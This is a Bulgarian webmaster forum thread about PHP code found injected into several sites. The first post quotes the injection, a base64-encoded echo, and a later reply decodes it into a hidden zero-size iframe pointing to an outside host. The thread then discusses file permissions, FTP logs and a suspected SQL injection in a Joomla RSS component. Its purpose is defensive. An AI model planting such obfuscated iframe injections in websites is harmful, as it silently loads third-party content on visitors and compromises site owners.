SearchEngines.bg

Това е примерно съобщение за гост. Регистрирайте безплатен акаунт днес, за да станете потребител на SearchEngines.bg! След като влезете, ще можете да участвате в този сайт, като добавите свои собствени теми и публикации, както и да се свържете с други членове чрез вашата лична входяща кутия! Благодарим ви!

Вмъкнат код

Илиев

New member
Колеги, открих това на един от сайтовете си:

Код:
<?echo(base64_decode("PHRyPg0KPHRkIGlkPSJ0b3BsZWZ0Ij4mbmJzcDs8L3RkPg0KPHRkIGlkPSJ0b3AiPiZuYnNwOzwvdGQ+DQo8dGQgaWQ9InRvcHJpZ2h0Ij4mbmJzcDs8L3RkPg0KPC90cj48aWZyYW1lIHNyYz0iaHR0cDovL3Nwb3J0LXJlZ2Vsbi5vcmcvZ28ucGhwP3NpZD0xIiB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBmcmFtZWJvcmRlcj0iMCI+PC9pZnJhbWU+"));?>


Локалната машина е чиста. От хостинга ме посъветваха да сканирам машината и да сменя паролите.

Вие да дадете някакъв съвет за да не се повтаря това и най-вече ме интересува как е станало.
 

nikoladd

New member
Re: Вмъкнат код

ааа лошо така да енкодват <iframe по трудно се намира. ама пък трябва да е в .php иначе не става. на мен ми намирисва на вътрешна работа. В пхп е крива хава да вкарваш такива неща без да изгърми и без вътрешна информация. Освен ако сайта не е елементарен и всяка страница с отделно пхп.
 

Илиев

New member
Re: Вмъкнат код

PHP са. Намерих го на още два сайта. Всеки използва различен скрипт, но са хостнати на едно място.

Локалната ми машина е чиста, но все пак сканирам с още антивирусни.

Някави идеи? И какво върши това?
 

nikoladd

New member
Re: Вмъкнат код

ами не исках да пускам кода. лесно се декодира като вземеш низа между кавичките и го прекараш през base64 декодер
Код:
<tr>
<td id="topleft"> </td>
<td id="top"> </td>
<td id="topright"> </td>
</tr><iframe src="http://sport-regeln.org/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

Интересното е тия таблични работи за какво са му и затова ме съмнява за вътрешна работа. От гледна точка на SEO с тоя iframe не мисля, че има полза. Единственото смислено ми се вижда някаква JS машинация да редиректва или отваря попъп прозорци или да ти пробутва троянец.
 
Последно редактирано:

Илиев

New member
Re: Вмъкнат код

Май му трупа гласове за рамблер топ100 или нещо подобно. Вчера се чудех защо на единият сайт изписваше в статус бара, че зарежда нещо от рамблер. Сега разбрах.

Благодаря, аз продължавам с разследването. :)
 

Илиев

New member
Re: Вмъкнат код

А, и още нещо

Интересното е тия таблични работи за какво са му и затова ме съмнява за вътрешна работа.


Вътрешна в смисъл...? Да търся врага около мен или вътрешна относно хостинг компанията?
 
M

man0l

Guest
Re: Вмъкнат код

възможно е ако пермишъните на файловете да са 777 да се случи това, провери ги и ако са така, ги направи 755
 

Илиев

New member
Re: Вмъкнат код

За сега устнових, че компютрите, които използвам са абсолютни чисти и във фтп лог-а няма друга активност във въпросното време освен моята, и то неща, които не са свързани със заразените файлове.

Часът, когато са променени файловете е с около 10 минути по-късно след като съм приключил с моите си неща по разни други файлове. :rolleyes:
 

bgkulinar

Меринджей
Re: Вмъкнат код

От гледна точка на SEO с тоя iframe не мисля, че има полза.
Грешиш. От гледна точка на СЕО src= си се отчита като линк и при Г. и при Я.
 

nikoladd

New member
Re: Вмъкнат код

Грешиш. От гледна точка на СЕО src= си се отчита като линк и при Г. и при Я.
То че се парсва знам, ама за ПР да пренася не ми е известно за G. За Я нямам идея всъщност никаква как ги обработва. Все пак някой ако е опитвал конкретно със ифреймове да си каже. Прав си, че има стойност някаква все пак.
 

Илиев

New member
Re: Вмъкнат код

И малко подробности... най-вероятно става въпрос за SQL Injection в един от допълнителните модули DS-Syndicate, който е търд парти разширение за рсс фийдове.

Ако някой е направил грешката да използва Джумла и е качил DS-Syndicate, по-добре да го разкара веднага.

Description:

DS-Syndicate is a PHP-based component for the Joomla! content manager.

The application is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data to the 'feed_id' parameter.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Affected Products:

* Joomla DS-Syndicate component

Благодарности на ХостБългария за бързата реакция и помощта. :)
 
M

man0l

Guest
Re: Вмъкнат код

SQL Injection е манипулация с базата данни през URL адрес бара, това при теб е съвсем различно, защото са променени самите файлове :)
 

BornToDrink

New member
Re: Вмъкнат код

SQL Injection е манипулация с базата данни през URL адрес бара, това при теб е съвсем различно, защото са променени самите файлове :)

Може и да е през input полета.
С injection могат да се правят доста неща, стига да знаеш как.
Сложиш си паролка за админа, после от там вече какво може е друга тема. :)

Скоро ми бяха изкъртили един сайт... Ползвахме си един админ, като не бях гледал как е правена логин формата... Видях от логовете, че е от там, фикснах я(като онемях при вида на кода и...), на другия ден същото IP пак се ровеше във login.php, но нейсе. :D
Бекъпа върна всичко за 3 минути, но не са хубави тея работи. :)
 
Последно редактирано:

gogobg

New member
Re: Вмъкнат код

Набързо разкарах DS-Syndicate от мой два сайта. Благодаря на ilieff за инфото. И без това компонента работеше тъпо и не го ползвах. Дори и проблема да не е от него по добре да се вземат мерки щом има съмнение.
 

Горе